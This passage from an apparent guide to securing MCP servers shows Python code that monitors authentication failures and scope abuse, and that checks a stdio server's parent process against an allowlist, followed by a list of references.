        self.failure_counts: dict[str, int] = defaultdict(int)
        self.alert_callback = alert_callback or self._default_alert
        self._alert_thresholds = {
            "brute_force": 10,         # failures per IP per hour
            "credential_stuffing": 5,  # unique invalid tokens per IP per hour
            "unusual_scope": 3,        # unauthorized tool access attempts
        }

    def record_event(self, event: AuthEvent):
        """Record and analyze an authentication event."""
        self.events.append(event)
        if event.event_type == "failure":
            self.failure_counts[event.client_ip] += 1
            self._check_brute_force(event)
        if event.event_type == "unauthorized_tool":
            self._check_scope_abuse(event)
        # Prune old events (keep 24 hours)
        cutoff = _utcnow() - timedelta(hours=24)
        self.events = [e for e in self.events if e.timestamp > cutoff]

    def _check_brute_force(self, event: AuthEvent):
        """Detect brute force authentication attempts."""
        cutoff = _utcnow() - timedelta(hours=1)
        recent_failures = sum(
            1 for e in self.events
            if e.client_ip == event.client_ip
            and e.event_type == "failure"
            and e.timestamp > cutoff
        )
        if recent_failures >= self._alert_thresholds["brute_force"]:
            self.alert_callback({
                "alert_type": "brute_force_detected",
                "severity": "high",
                "client_ip": event.client_ip,
                "failure_count": recent_failures,
                "window": "1 hour",
                "recommendation": f"Block IP {event.client_ip} and investigate",
            })

    def _check_scope_abuse(self, event: AuthEvent):
        """Detect clients trying to access unauthorized tools."""
        cutoff = _utcnow() - timedelta(hours=1)
        scope_violations = sum(
            1 for e in self.events
            if e.client_cn == event.client_cn
            and e.event_type == "unauthorized_tool"
            and e.timestamp > cutoff
        )
        if scope_violations >= self._alert_thresholds["unusual_scope"]:
            self.alert_callback({
                "alert_type": "scope_abuse_detected",
                "severity": "high",
                "client_cn": event.client_cn,
                "violation_count": scope_violations,
                "last_tool": event.tool_name,
                "recommendation": (
                    f"Review permissions for {event.client_cn} "
                    f"and check for compromised credentials"
                ),
            })

    def _default_alert(self, alert: dict):
        logger.critical(json.dumps({
            "event": "mcp_auth_alert",
            **alert,
            "timestamp": _utcnow().isoformat(),
        }))

    def get_dashboard_stats(self) -> dict:
        """Return stats for security dashboard."""
        cutoff_1h = _utcnow() - timedelta(hours=1)
        cutoff_24h = _utcnow() - timedelta(hours=24)
        events_1h = [e for e in self.events if e.timestamp > cutoff_1h]
        events_24h = [e for e in self.events if e.timestamp > cutoff_24h]
        return {
            "last_hour": {
                "total": len(events_1h),
                "successes": sum(1 for e in events_1h if e.event_type == "success"),
                "failures": sum(1 for e in events_1h if e.event_type == "failure"),
                "unique_ips": len(set(e.client_ip for e in events_1h)),
            },
            "last_24h": {
                "total": len(events_24h),
                "successes": sum(1 for e in events_24h if e.event_type == "success"),
                "failures": sum(1 for e in events_24h if e.event_type == "failure"),
                "unique_ips": len(set(e.client_ip for e in events_24h)),
                "unique_clients": len(set(
                    e.client_cn for e in events_24h if e.event_type == "success"
                )),
            },
        }
Securing stdio-Based MCP Servers
stdio servers do not use network authentication, but they still need access control:
"""
Security controls for stdio-based MCP servers.
Since stdio uses process-level access, controls focus on:
- Verifying the parent process identity
- Restricting which tools the spawning process can access
- Logging all operations for audit
"""
import os
import logging

logger = logging.getLogger("mcp.stdio.security")


def verify_parent_process() -> dict:
    """
    Verify the identity of the process that spawned this MCP server.
    Returns parent process information for authorization decisions.
    Relies on /proc, so it works on Linux only.
    """
    ppid = os.getppid()
    parent_info = {}
    try:
        # Read parent process command line
        cmdline_path = f"/proc/{ppid}/cmdline"
        with open(cmdline_path, 'rb') as f:
            cmdline = f.read().decode('utf-8', errors='replace').split('\x00')
        parent_info["cmdline"] = cmdline

        # Read parent process executable
        exe_path = os.readlink(f"/proc/{ppid}/exe")
        parent_info["executable"] = exe_path

        # Read parent process user (first field is the real UID/GID)
        stat_path = f"/proc/{ppid}/status"
        with open(stat_path, 'r') as f:
            for line in f:
                if line.startswith("Uid:"):
                    uids = line.split()[1:]
                    parent_info["uid"] = int(uids[0])
                elif line.startswith("Gid:"):
                    gids = line.split()[1:]
                    parent_info["gid"] = int(gids[0])
    except OSError as e:
        # Covers missing /proc entries, permission errors, and exited parents
        logger.error("Cannot verify parent process %d: %s", ppid, e)
        parent_info["error"] = str(e)
    return parent_info


# Allowlist of executables that may spawn this MCP server
ALLOWED_PARENTS = {
    "/usr/bin/claude",
    "/usr/local/bin/cursor",
    "/usr/bin/code",
    "/opt/mcp-host/bin/mcp-host",
}


def enforce_parent_allowlist():
    """Refuse to start if the parent process is not in the allowlist."""
    parent = verify_parent_process()
    # A failed lookup leaves "executable" unset, so the check fails closed
    exe = parent.get("executable", "unknown")
    if exe not in ALLOWED_PARENTS:
        logger.critical(
            "MCP server started by unauthorized parent: %s (PID %d)",
            exe, os.getppid()
        )
        raise SystemExit(
            f"Unauthorized parent process: {exe}. "
            f"Allowed: {ALLOWED_PARENTS}"
        )
    logger.info("Parent process verified: %s (PID %d)", exe, os.getppid())
References
- VulnerableMCP Project: Systematic scan of 500+ public MCP servers finding 38% without authentication
- eSentire CISO Advisory: "Securing MCP Deployments" -- enterprise guidance for MCP authentication
- MCP Specification: Model Context Protocol -- Transport and session management sections
- OWASP ASI: Agentic Security Initiative -- Authentication and access control requirements
- Pomerium: "Zero Trust for MCP" -- proxy-based authentication for MCP servers
- RFC 8705: OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens